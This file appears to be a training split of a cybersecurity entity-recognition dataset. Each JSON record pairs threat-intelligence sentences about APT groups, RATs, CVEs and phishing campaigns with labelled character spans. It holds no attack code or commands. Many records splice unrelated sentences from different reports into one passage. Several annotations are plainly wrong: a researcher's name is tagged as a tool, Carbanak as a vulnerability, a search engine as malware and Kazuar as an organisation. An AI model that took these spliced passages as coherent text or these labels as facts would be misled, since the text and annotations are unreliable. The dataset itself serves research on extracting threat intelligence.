{"text": "The malware has all the popular capabilities of modern spyware . On February 28 , the McAfee Advanced Threat Research team discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations . APT33 : 0b3610524ff6f67c59281dbf4a24a6e8753b965c15742c8a98c11ad9171e783d S-SHA2 Quasar RAT . These victims decrypted their files without accepting the ransom demands saving these individuals an estimated 1.5 billion .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[86, 117]], "THREAT_ACTOR: cybercrime group": [[143, 159]], "THREAT_ACTOR: HIDDEN COBRA": [[160, 172]], "ORGANIZATION: cryptocurrency": [[193, 207]], "ORGANIZATION: financial organizations": [[212, 235]], "THREAT_ACTOR: APT33": [[238, 243]], "MALWARE: 0b3610524ff6f67c59281dbf4a24a6e8753b965c15742c8a98c11ad9171e783d S-SHA2 Quasar RAT": [[246, 328]], "ORGANIZATION: victims": [[337, 344]]}, "info": {"id": "cyberner_stix_train_007354", "source": "cyberner_stix_train"}}
{"text": "Use of customized njRAT ( capable of evading anti-virus ) .", "spans": {"MALWARE: njRAT": [[18, 23]]}, "info": {"id": "cyberner_stix_train_007355", "source": "cyberner_stix_train"}}
{"text": "TG-3390 actors favor At.exe to create scheduled tasks for executing commands on remote systems .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "FILEPATH: At.exe": [[21, 27]]}, "info": {"id": "cyberner_stix_train_007356", "source": "cyberner_stix_train"}}
{"text": "You may review your application list in “ Settings - > Apps ” , if you find one of this applications , please consider downloading an antivirus product such as Check Point ZoneAlarm to check if you are indeed infected . As detailed in the DOJ complaint , a sample of WHITEOUT malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank . . A Microsoft Exchange server is composed of two major components : the frontend , also known as the Client Access Service , and the backend .", "spans": {"ORGANIZATION: Check Point": [[160, 171]], "SYSTEM: ZoneAlarm": [[172, 181]], "TOOL: WHITEOUT malware": [[267, 283]], "THREAT_ACTOR: APT38": [[300, 305]], "ORGANIZATION: bank": [[363, 367]], "SYSTEM: Microsoft Exchange server": [[374, 399]], "SYSTEM: Client Access Service": [[471, 492]]}, "info": {"id": "cyberner_stix_train_007357", "source": "cyberner_stix_train"}}
{"text": "Is the malware already set as the default SMS application ? Between May 2017 and December 2018 , a multi-purpose command tool that has been used by Whitefly was also used in attacks against defense , telecoms , and energy targets in Southeast Asia and Russia . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": {"THREAT_ACTOR: Whitefly": [[148, 156]], "ORGANIZATION: defense": [[190, 197]], "ORGANIZATION: telecoms": [[200, 208]], "ORGANIZATION: energy": [[215, 221]], "THREAT_ACTOR: attackers": [[265, 274]], "TOOL: emails": [[289, 295]], "FILEPATH: XLS files": [[321, 330]], "ORGANIZATION: employees working in the banking sector": [[334, 373]]}, "info": {"id": "cyberner_stix_train_007358", "source": "cyberner_stix_train"}}
{"text": "The library that uses tinyML is not yet wired to the malware ’ s functionalities , but its presence in the malware code indicates the intention to do so in future variants . Ke3chang attackers have used spear-phishing emails . Analysis in multiple maturity levels , One interesting detail about Hack520 is his apparent love for pigs , as seen in his use of the word in his email addresses .", "spans": {"SYSTEM: tinyML": [[22, 28]], "THREAT_ACTOR: Ke3chang": [[174, 182]], "THREAT_ACTOR: attackers": [[183, 192]], "THREAT_ACTOR: Hack520": [[295, 302]]}, "info": {"id": "cyberner_stix_train_007359", "source": "cyberner_stix_train"}}
{"text": "Patchwork targets were chosen worldwide with a focus on personnel working on military and political assignments , and specifically those working on issues relating to Southeast Asia and the South China Sea . The attackers used different command and control servers ( C2s ) for each malware family , a tactic we believe was meant to thwart attempts to tie the attacks together using infrastructure alone .", "spans": {"THREAT_ACTOR: Patchwork": [[0, 9]], "ORGANIZATION: personnel": [[56, 65]], "ORGANIZATION: military and political assignments": [[77, 111]], "MALWARE: command and control servers": [[237, 264]]}, "info": {"id": "cyberner_stix_train_007360", "source": "cyberner_stix_train"}}
{"text": "Once an exploitable page is identified , Clever Kitten will attempt to upload a PHP backdoor to gain remote access to the system . The threat actors have used the Baidu search engine , which is only available in Chinese , to conduct reconnaissance activities .", "spans": {"MALWARE: Baidu search engine": [[163, 182]]}, "info": {"id": "cyberner_stix_train_007361", "source": "cyberner_stix_train"}}
{"text": "Publicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible .", "spans": {"TOOL: Wi-Fi networks": [[20, 34]]}, "info": {"id": "cyberner_stix_train_007362", "source": "cyberner_stix_train"}}
{"text": "mobile_treats_2013_05s Infections caused by mobile banking programs Today , the majority of banking Trojan attacks affect users in Russia and the CIS . The document attached to this e-mail exploits CVE-2012-0158 . One can observe that the C&C URL used by both Winnti and ShadowPad complies to the scheme [backdoor_type][target_name].domain.tld : 443 where [backdoor_type] is a single letter which is either “ w ” in the case of the Winnti malware or “ b ” in the case of ShadowPad . The vulnerability , which could allow attackers to gain escalated privileges and unauthorized access to an environment , was first disclosed on May 31st in a security bulletin released by Progress .", "spans": {"VULNERABILITY: e-mail exploits": [[182, 197]], "VULNERABILITY: CVE-2012-0158": [[198, 211]], "TOOL: C&C": [[239, 242]], "MALWARE: Winnti": [[260, 266], [432, 438]], "MALWARE: ShadowPad": [[271, 280], [471, 480]], "ORGANIZATION: Progress": [[671, 679]]}, "info": {"id": "cyberner_stix_train_007363", "source": "cyberner_stix_train"}}
{"text": "These campaigns utilized specially-crafted malicious Microsoft Word documents and PDF files , which were sent as e-mail attachments to various personnel in an attempt to infiltrate the targeted organizations .", "spans": {"ORGANIZATION: Microsoft": [[53, 62]], "TOOL: Word": [[63, 67]], "TOOL: PDF": [[82, 85]], "TOOL: e-mail": [[113, 119]]}, "info": {"id": "cyberner_stix_train_007364", "source": "cyberner_stix_train"}}
{"text": "The attackers relied heavily on the CVE-2014-0515 Metasploit module , which is well documented .", "spans": {"VULNERABILITY: CVE-2014-0515": [[36, 49]], "TOOL: Metasploit": [[50, 60]]}, "info": {"id": "cyberner_stix_train_007365", "source": "cyberner_stix_train"}}
{"text": "Should a user enable this content , the attackers are then able to use the DDE protocol to remotely execute commands in memory on the victim 's system . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device .", "spans": {"THREAT_ACTOR: attackers": [[40, 49]], "TOOL: DDE protocol": [[75, 87]], "FILEPATH: SWAnalytics": [[178, 189]]}, "info": {"id": "cyberner_stix_train_007366", "source": "cyberner_stix_train"}}
{"text": "Attackers are taking the time and effort to steal certificates because it is becoming necessary to gain a foothold on a targeted computer .", "spans": {}, "info": {"id": "cyberner_stix_train_007367", "source": "cyberner_stix_train"}}
{"text": "For the Trojan to install , the user must allow installation of apps from unknown sources in the device settings . The compile dates of the samples analyzed by CTU researchers are all later than the hard-coded August 8 , 2013 date , indicating that the code might be reused from previous tools . Both init and init2 scripts make sure all other running mining services are killed , and that all the files in the working directory are executed by giving 777 permissions . Budworm executes SysUpdate on victim networks by DLL sideloading the payload using the legitimate INISafeWebSSO application .", "spans": {"ORGANIZATION: CTU": [[160, 163]], "FILEPATH: init": [[301, 305]], "FILEPATH: init2": [[310, 315]], "THREAT_ACTOR: Budworm": [[470, 477]], "MALWARE: SysUpdate": [[487, 496]], "TOOL: INISafeWebSSO application": [[568, 593]]}, "info": {"id": "cyberner_stix_train_007368", "source": "cyberner_stix_train"}}
{"text": "Dragos assesses with moderate confidence that XENOTIME intends to establish required access and capability to cause a potential , future disruptive—or even destructive—event .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "THREAT_ACTOR: XENOTIME": [[46, 54]]}, "info": {"id": "cyberner_stix_train_007369", "source": "cyberner_stix_train"}}
{"text": "The Dukes continued the expansion of their arsenal in 2011 with the addition of two more toolsets : MiniDuke and CozyDuke .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]], "MALWARE: MiniDuke": [[100, 108]], "MALWARE: CozyDuke": [[113, 121]]}, "info": {"id": "cyberner_stix_train_007370", "source": "cyberner_stix_train"}}
{"text": "FakeM 's functional code is shellcode-based and requires another Trojan to load it into memory and execute it . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations .", "spans": {"TOOL: FakeM": [[0, 5]], "THREAT_ACTOR: Lazarus": [[156, 163]], "TOOL: emails": [[184, 190]], "ORGANIZATION: Bitcoin users": [[241, 254]], "ORGANIZATION: financial organizations": [[266, 289]]}, "info": {"id": "cyberner_stix_train_007371", "source": "cyberner_stix_train"}}
{"text": "The link points to a web page with a similar sentence and a button for downloading the APK file of the Trojan to the device . Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs . Most of these commands are related to gathering information from the infected machine ( number of CPU cores , users , scheduled tasks , running processes , OS installed , and CPU and memory information ) via the dota3 payload , as well as changing the password to a random string also stored in /tmp/up.txt . Recently , concerns have grown regarding the rapid growth of commercial spyware tools , and the way in which they are being used against their intended victims .", "spans": {"ORGANIZATION: CTU": [[154, 157]], "THREAT_ACTOR: TG-3390": [[182, 189]], "ORGANIZATION: political intelligence": [[291, 313]], "ORGANIZATION: governments": [[319, 330]], "TOOL: dota3": [[554, 559]], "TOOL: commercial spyware tools": [[712, 736]]}, "info": {"id": "cyberner_stix_train_007372", "source": "cyberner_stix_train"}}
{"text": "The server then sends a reply that contains instructions on further actions to be taken . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate . Dragos has identified Leafminer group targeting access operations in the electric utility sector .", "spans": {"MALWARE: decoy files": [[156, 167]], "ORGANIZATION: Dragos": [[245, 251]], "THREAT_ACTOR: Leafminer group": [[267, 282]], "ORGANIZATION: electric utility sector": [[318, 341]]}, "info": {"id": "cyberner_stix_train_007373", "source": "cyberner_stix_train"}}
{"text": "Using off-the-shelf obfuscation ( packer ) from Baidu to re-introduce the malware to Google Play after the first instance was removed on Aug 24th . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . In the majority of instances APT10 used either a reverse shell or RDP connection to install its malware ; the actor also uses these methods to propagate across the network .", "spans": {"ORGANIZATION: Baidu": [[48, 53]], "SYSTEM: Google Play": [[85, 96]], "ORGANIZATION: CSIS": [[198, 202]], "VULNERABILITY: Carbanak": [[236, 244]], "ORGANIZATION: customers": [[274, 283]], "THREAT_ACTOR: APT10": [[315, 320]], "MALWARE: reverse shell": [[335, 348]], "MALWARE: RDP": [[352, 355]], "THREAT_ACTOR: actor": [[396, 401]]}, "info": {"id": "cyberner_stix_train_007374", "source": "cyberner_stix_train"}}
{"text": "The winrar binaries and compressed data were found mostly in the Recycle Bin folder , a TTP that was previously observed in APT10-related attacks , as well as others . Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions .", "spans": {"TOOL: winrar": [[4, 10]], "TOOL: Recycle Bin folder": [[65, 83]], "TOOL: TTP": [[88, 91]], "ORGANIZATION: intelligence services": [[235, 256]], "ORGANIZATION: military": [[259, 267]], "ORGANIZATION: utility providers": [[270, 287]], "ORGANIZATION: telecommunications": [[290, 308]], "ORGANIZATION: power": [[313, 318]], "ORGANIZATION: embassies": [[323, 332]], "ORGANIZATION: government institutions": [[339, 362]]}, "info": {"id": "cyberner_stix_train_007375", "source": "cyberner_stix_train"}}
{"text": "Once Orangeworm has infiltrated a victim 's network , they deploy Trojan.Kwampirs , a backdoor Trojan that provides the attackers with remote access to the compromised computer . Both the Trochilus and MoonWind RATs were hosted on the same compromised sites and used to target the same organization at the same time .", "spans": {"TOOL: backdoor Trojan": [[86, 101]], "THREAT_ACTOR: attackers": [[120, 129]], "MALWARE: Trochilus": [[188, 197]], "MALWARE: MoonWind RATs": [[202, 215]]}, "info": {"id": "cyberner_stix_train_007376", "source": "cyberner_stix_train"}}
{"text": "Concurrently with the alterations to CosmicDuke , the Dukes were also hard at work modifying their trusted loader .", "spans": {"MALWARE: CosmicDuke": [[37, 47]], "THREAT_ACTOR: Dukes": [[54, 59]]}, "info": {"id": "cyberner_stix_train_007377", "source": "cyberner_stix_train"}}
{"text": "In all of these cases , the techniques are the same , but the code itself has been altered to work with the toolset in question , leading to small differences in the final implementation .", "spans": {}, "info": {"id": "cyberner_stix_train_007378", "source": "cyberner_stix_train"}}
{"text": "Another variant executes a set of commands once a system is successfully compromised .", "spans": {}, "info": {"id": "cyberner_stix_train_007379", "source": "cyberner_stix_train"}}
{"text": "Cylance tracks this threat group internally as ' Snake Wine ' . The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": {"ORGANIZATION: Cylance": [[0, 7]], "THREAT_ACTOR: Snake Wine": [[49, 59]], "THREAT_ACTOR: actor’s": [[75, 82]], "TOOL: emails": [[83, 89]], "FILEPATH: malicious payload": [[136, 153]], "ORGANIZATION: users": [[218, 223]]}, "info": {"id": "cyberner_stix_train_007380", "source": "cyberner_stix_train"}}
{"text": "Based on our research and Benoît Ancel 's tracker , this C2 was used by Wolf Intelligence : Additionally , we identified two empty panels on a C2 server . As far as we can judge from the data we have , in 2014 the criminal group behind Lurk seriously reduced its activity and \" lived from hand to mouth \" , attacking anyone they could , including ordinary users . Most of the samples appeared to have at least three C&C servers hard coded for redundancy . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": {"ORGANIZATION: Wolf Intelligence": [[72, 89]], "TOOL: Lurk": [[236, 240]], "TOOL: C&C": [[416, 419]], "ORGANIZATION: Malwarebytes": [[456, 468]]}, "info": {"id": "cyberner_stix_train_007381", "source": "cyberner_stix_train"}}
{"text": "In the third version spotted in the wild , the author introduced parts of the source code of the infamous Anubis Trojan ( which was leaked earlier in 2019 ) . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . With multiple tools and anonymous infrastructure , they are running longstanding and persistent attack campaigns .", "spans": {"MALWARE: Anubis": [[106, 112]], "MALWARE: UMBRAGE": [[159, 166]], "TOOL: multiple tools": [[358, 372]], "TOOL: anonymous infrastructure": [[377, 401]]}, "info": {"id": "cyberner_stix_train_007382", "source": "cyberner_stix_train"}}
{"text": "It’s now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware , ” said Dennis Schwarz , research analyst on Arbor , in an interview with Threatpost . We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . Instead , sensitive KHNP documents were leaked by the actors as part of an effort to exaggerate the access they had and embarrass the South Korean Government , a technique we assess North Korea would turn to again in order to instill fear and/or meet domestic propaganda aims . North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide .", "spans": {"TOOL: malware": [[129, 136]], "TOOL: Dennis Schwarz": [[146, 160]], "ORGANIZATION: Arbor": [[183, 188]], "THREAT_ACTOR: groups": [[253, 259]], "ORGANIZATION: government": [[308, 318]], "ORGANIZATION: electric": [[332, 340]], "FILEPATH: KHNP documents": [[461, 475]], "THREAT_ACTOR: actors": [[495, 501]], "ORGANIZATION: South Korean Government": [[575, 598]], "ORGANIZATION: financial": [[856, 865]], "ORGANIZATION: nations": [[877, 884]]}, "info": {"id": "cyberner_stix_train_007383", "source": "cyberner_stix_train"}}
{"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . Most recently , the NetTraveler group 's main domains of interest for cyberespionage activities include space exploration , nanotechnology , energy production , nuclear power , lasers , medicine and communications .", "spans": {"MALWARE: CreateRemoteThread": [[192, 210]], "MALWARE: WriteProcessMemory": [[214, 232]], "ORGANIZATION: space exploration": [[339, 356]], "ORGANIZATION: nanotechnology": [[359, 373]], "ORGANIZATION: energy production": [[376, 393]], "ORGANIZATION: nuclear power": [[396, 409]], "ORGANIZATION: lasers": [[412, 418]], "ORGANIZATION: medicine": [[421, 429]], "ORGANIZATION: communications": [[434, 448]]}, "info": {"id": "cyberner_stix_train_007384", "source": "cyberner_stix_train"}}
{"text": "This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa) . It's possible TG-3390 used a waterhole to infect data center employees .", "spans": {"THREAT_ACTOR: attackers": [[29, 38]], "THREAT_ACTOR: TG-3390": [[150, 157]], "ORGANIZATION: data center employees": [[185, 206]]}, "info": {"id": "cyberner_stix_train_007385", "source": "cyberner_stix_train"}}
{"text": "Several technical details indicated that the software was likely the product of a well-funded development effort and aimed at the lawful intercept market . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research . When successfully executed , the malicious documents install a backdoor we track as POWERSTATS .", "spans": {"VULNERABILITY: Carbanak": [[184, 192]], "ORGANIZATION: banks": [[226, 231]], "MALWARE: backdoor": [[412, 420]], "MALWARE: POWERSTATS": [[433, 443]]}, "info": {"id": "cyberner_stix_train_007386", "source": "cyberner_stix_train"}}
{"text": "Analysis of this telemetry shows infected devices are completely based in Gaza , Palestine . In particular , FireEye during the fall of 2013 called out infrastructure overlap between Ephemeral Hydra and DeputyDog . They usually download HTML pages from a system within APT1 ’s hop infrastructure . For the actors and groups who originally created the malware , it is a more reliable income stream for them .", "spans": {"ORGANIZATION: FireEye": [[109, 116]], "TOOL: DeputyDog": [[203, 212]], "TOOL: HTML": [[237, 241]], "THREAT_ACTOR: APT1": [[269, 273]], "THREAT_ACTOR: actors": [[306, 312]]}, "info": {"id": "cyberner_stix_train_007387", "source": "cyberner_stix_train"}}
{"text": "Through this vector , we could drop our own Quasar clien on the attacker ’s server and execute it .", "spans": {"MALWARE: Quasar": [[44, 50]]}, "info": {"id": "cyberner_stix_train_007388", "source": "cyberner_stix_train"}}
{"text": "The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . Based on our analysis , we believe that threat actors may compile Windows and Unix based payloads using the same code to deploy Kazuar against both platforms .", "spans": {"MALWARE: .rtf file": [[43, 52]], "VULNERABILITY: CVE-2017-0199": [[68, 81]], "SYSTEM: Windows": [[150, 157]], "ORGANIZATION: Kazuar": [[212, 218]]}, "info": {"id": "cyberner_stix_train_007389", "source": "cyberner_stix_train"}}
{"text": "The CloudDuke downloader will download and execute additional malware from a preconfigured location .", "spans": {"MALWARE: CloudDuke": [[4, 13]], "TOOL: downloader": [[14, 24]]}, "info": {"id": "cyberner_stix_train_007390", "source": "cyberner_stix_train"}}
{"text": "During this period , malware samples display some typical adware characteristics such as unnecessary permission requirements and pop-up windows . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . To combat threats , several next-generation protection engines in Microsoft Defender Advanced Threat Protection ’s antivirus component detect and stop malicious techniques at multiple points along the attack chain . This activity is followed quickly by additional access and persistent mechanisms .", "spans": {"SYSTEM: windows": [[136, 143]], "THREAT_ACTOR: Patchwork": [[155, 164]], "MALWARE: RTF files": [[191, 200]], "VULNERABILITY: CVE-2017-8570": [[212, 225]], "TOOL: Microsoft Defender Advanced Threat Protection": [[294, 339]], "TOOL: antivirus component": [[343, 362]]}, "info": {"id": "cyberner_stix_train_007391", "source": "cyberner_stix_train"}}
{"text": "Just as threat actors may use stolen branding in their email lures to trick potential victims , they reproduce a legitimate domain name in a fraudulent domain that is not controlled by the bank . At this time , we do not believe that the attackers found a new ASA exploit . APT29 : YTTRIUM , The Dukes , Cozy Bear , CozyDuke .", "spans": {"ORGANIZATION: we": [[211, 213]], "THREAT_ACTOR: attackers": [[238, 247]], "VULNERABILITY: ASA": [[260, 263]], "VULNERABILITY: exploit": [[264, 271]], "THREAT_ACTOR: APT29": [[274, 279]], "THREAT_ACTOR: YTTRIUM": [[282, 289]], "THREAT_ACTOR: The Dukes": [[292, 301]], "THREAT_ACTOR: Cozy Bear": [[304, 313]], "THREAT_ACTOR: CozyDuke": [[316, 324]]}, "info": {"id": "cyberner_stix_train_007392", "source": "cyberner_stix_train"}}
{"text": "The malware uses infected devices to generate large amounts of fraudulent clicks on advertisements , generating revenues for the perpetrators behind it . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China . That is performed by the function DeleteAndLogPlugin . Using differential firmware analysis , we identified the vulnerable endpoint and developed a PoC to validate the vulnerability .", "spans": {"ORGANIZATION: gaming organizations": [[203, 223]]}, "info": {"id": "cyberner_stix_train_007393", "source": "cyberner_stix_train"}}
{"text": "Retrieve all SMS messages . the group 's targets include an embassy in Belgium . The decoy content of the malicious files revolves around various political affairs in the Middle East , specifically targeting the tension between Hamas and other entities in the region . All of these things point to threat actors and groups like Winnti will continue to try different methods of attack .", "spans": {"ORGANIZATION: embassy": [[60, 67]], "THREAT_ACTOR: threat actors": [[298, 311]], "THREAT_ACTOR: Winnti": [[328, 334]]}, "info": {"id": "cyberner_stix_train_007394", "source": "cyberner_stix_train"}}
{"text": "WE GIVE 100 % GUARANTEE THAT ALL FILES WILL RESTORE AFTER WE RECEIVE PAYMENT . Group-IB researchers were tracking Silence throughout this period and conducting response following incidents in the financial sector . Both executed a JScript file named “ error ” in %TEMP% ( Errors.txt in the case of FIN7 , Errors.bat for EmpireMonkey ) . Monitor for API calls that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: Group-IB": [[79, 87]], "ORGANIZATION: financial sector": [[196, 212]], "TOOL: JScript": [[231, 238]], "FILEPATH: Errors.txt": [[272, 282]], "THREAT_ACTOR: FIN7": [[298, 302]], "FILEPATH: Errors.bat": [[305, 315]], "MALWARE: EmpireMonkey": [[320, 332]]}, "info": {"id": "cyberner_stix_train_007395", "source": "cyberner_stix_train"}}
{"text": "Then , it sends it to the C2 server using the URL that ends with /servlet/ContactUpload . Also , the NCSC advisory mentioned that the actors used a file name stylecss.aspx for their webshell , which is the same filename we saw associated with China Chopper . McAfee Advanced Threat Research team 's analysis , we find multiple components from this operation are unique from a code perspective , even though the code is loosely based on previous versions of the SYSCON backdoor .", "spans": {"MALWARE: stylecss.aspx": [[158, 171]], "MALWARE: China Chopper": [[243, 256]], "ORGANIZATION: McAfee Advanced Threat Research": [[259, 290]], "MALWARE: SYSCON backdoor": [[461, 476]]}, "info": {"id": "cyberner_stix_train_007396", "source": "cyberner_stix_train"}}
{"text": "Night Dragon 's attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . With default settings , SWAnalytics will scan through an Android device’s external storage , looking for directory tencent/MobileQQ/WebViewCheck” .", "spans": {"THREAT_ACTOR: Night Dragon": [[0, 12]], "ORGANIZATION: social engineering": [[38, 56]], "TOOL: remote administration tools": [[209, 236]], "TOOL: RATs": [[239, 243]], "ORGANIZATION: oil and gas": [[368, 379]], "FILEPATH: SWAnalytics": [[432, 443]], "SYSTEM: Android": [[465, 472]]}, "info": {"id": "cyberner_stix_train_007397", "source": "cyberner_stix_train"}}
{"text": "One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . Our direct observation of in-the-wild spearphishing attacks staged by the Bahamut group have been solely attempts to deceive targets into providing account passwords through impersonation of notices from platform providers .", "spans": {"VULNERABILITY: zero-day vulnerability": [[31, 53]], "ORGANIZATION: Symantec": [[84, 92]], "ORGANIZATION: platform providers": [[299, 317]]}, "info": {"id": "cyberner_stix_train_007398", "source": "cyberner_stix_train"}}
{"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . Employing a technique known as \" spear phishing \" , Barium has heavily targeted individuals within HumanResources or Business Developmentdepartments ofthe targeted organizations in order to compromise the computers ofsuch individuals .", "spans": {"MALWARE: Pony DLL": [[89, 97]], "MALWARE: Vawtrak": [[102, 109]], "THREAT_ACTOR: Barium": [[251, 257]]}, "info": {"id": "cyberner_stix_train_007399", "source": "cyberner_stix_train"}}
{"text": "It is interesting to see that the HTTP POST host header refers to a legitimate domain cnet.com , however , in acutality , the data is sent to nysura.com , as can be seen in the traffic screenshot below .", "spans": {"DOMAIN: cnet.com": [[86, 94]], "DOMAIN: nysura.com": [[142, 152]]}, "info": {"id": "cyberner_stix_train_007400", "source": "cyberner_stix_train"}}
{"text": "The creator of the weaponized document appended their DDE instructions to the end of the document after all of the decoy contents .", "spans": {}, "info": {"id": "cyberner_stix_train_007401", "source": "cyberner_stix_train"}}
{"text": "The IP addresses hosting remote templates and C2 services in these attacks are classified as Command and Control .", "spans": {"TOOL: C2": [[46, 48]], "TOOL: Command and Control": [[93, 112]]}, "info": {"id": "cyberner_stix_train_007402", "source": "cyberner_stix_train"}}
{"text": "The most recent attacks focusing on the chemical industry are using password-protected 7zip files which , when extracted , contain a self-extracting executable .", "spans": {"TOOL: 7zip": [[87, 91]]}, "info": {"id": "cyberner_stix_train_007403", "source": "cyberner_stix_train"}}
{"text": "The first evidence of its intrusion dated from May 6 , 2015 but activity appeared to have begun in earnest on May 12 . They are often targeted simultaneously with other ethnic minorities and religious groups in China .", "spans": {"ORGANIZATION: ethnic minorities": [[169, 186]], "ORGANIZATION: religious groups": [[191, 207]]}, "info": {"id": "cyberner_stix_train_007404", "source": "cyberner_stix_train"}}
{"text": "Figure 4 : Loader calls initialization method Technical Analysis – Core Module With the main purpose of spreading the infection , “ Agent Smith ” implements in the “ core ” module : A series of ‘ Bundle ’ vulnerabilities , which is used to install applications without the victim ’ s awareness . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . These legitimate system processes include msiexec.exe ( for installing MSI packages ) , unzIP . During the SolarWinds Compromise , APT29 gained access through compromised accounts at cloud solution partners , and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems .", "spans": {"MALWARE: Agent Smith": [[132, 143]], "VULNERABILITY: Bundle": [[196, 202]], "MALWARE: document": [[303, 311]], "VULNERABILITY: CVE-2012-0158": [[360, 373]], "VULNERABILITY: CVE-2013-3906": [[376, 389]], "VULNERABILITY: CVE-2014-1761": [[393, 406]], "FILEPATH: msiexec.exe": [[516, 527]], "TOOL: MSI": [[545, 548]], "TOOL: unzIP": [[562, 567]], "THREAT_ACTOR: the SolarWinds Compromise": [[577, 602]], "THREAT_ACTOR: APT29": [[605, 610]]}, "info": {"id": "cyberner_stix_train_007405", "source": "cyberner_stix_train"}}
{"text": "Alternatively , OnionDuke also steals user credentials from its victims , providing another potential revenue source .", "spans": {"MALWARE: OnionDuke": [[16, 25]]}, "info": {"id": "cyberner_stix_train_007406", "source": "cyberner_stix_train"}}
{"text": "While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . One big unknown was the infection vector for Turla ( aka Snake or Uroburos ) .", "spans": {"ORGANIZATION: Secureworks": [[39, 50]], "THREAT_ACTOR: BRONZE BUTLER": [[82, 95]], "VULNERABILITY: CVE-2016-7836": [[162, 175]], "THREAT_ACTOR: Turla": [[307, 312]], "THREAT_ACTOR: Snake": [[319, 324]], "THREAT_ACTOR: Uroburos": [[328, 336]]}, "info": {"id": "cyberner_stix_train_007407", "source": "cyberner_stix_train"}}
{"text": "It was also used in limited attacks in Korea and Japan . The Cobalt group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia . Originally the code called the optblock_t : :f unc callback in MMAT_GLBOPT1 and MMAT_GLBOPT2 , By analyzing the source code , researchers can identify similar patterns and techniques used by different threat actors , providing defenders with a way to proactively detect and block the new variants at the initial stage of an attack .", "spans": {"THREAT_ACTOR: Cobalt group": [[61, 73]], "TOOL: Cobalt Strike": [[82, 95]], "THREAT_ACTOR: cyber heists": [[131, 143]], "ORGANIZATION: financial institutions": [[155, 177]], "TOOL: optblock_t : :f unc": [[254, 273]], "TOOL: MMAT_GLBOPT1": [[286, 298]], "TOOL: MMAT_GLBOPT2": [[303, 315]]}, "info": {"id": "cyberner_stix_train_007408", "source": "cyberner_stix_train"}}
{"text": "WRITE_SMS - Allows the application to write to SMS messages stored on the device or SIM card , including y deleting messages . This tool was previously observed during a Mandiant incident response in 2018 and , to date , solely utilized by APT34 . Starting in mid-February , Unit 42 researchers have been tracking an active campaign sharing a significant portion of infrastructure leveraged by Gorgon Group for criminal and targeted attacks .", "spans": {"TOOL: tool": [[132, 136]], "THREAT_ACTOR: APT34": [[240, 245]], "ORGANIZATION: Unit 42": [[275, 282]], "THREAT_ACTOR: Gorgon Group": [[394, 406]]}, "info": {"id": "cyberner_stix_train_007409", "source": "cyberner_stix_train"}}
{"text": "Employ stronger credentials , for instance , to make them less susceptible to unauthorized access . In recent years , Lazarus has also become involved in financially motivated attacks . Winnti : More than just Windows and Gates .", "spans": {"THREAT_ACTOR: Lazarus": [[118, 125]], "ORGANIZATION: financially": [[154, 165]], "MALWARE: Winnti": [[186, 192]], "SYSTEM: Windows": [[210, 217]]}, "info": {"id": "cyberner_stix_train_007410", "source": "cyberner_stix_train"}}
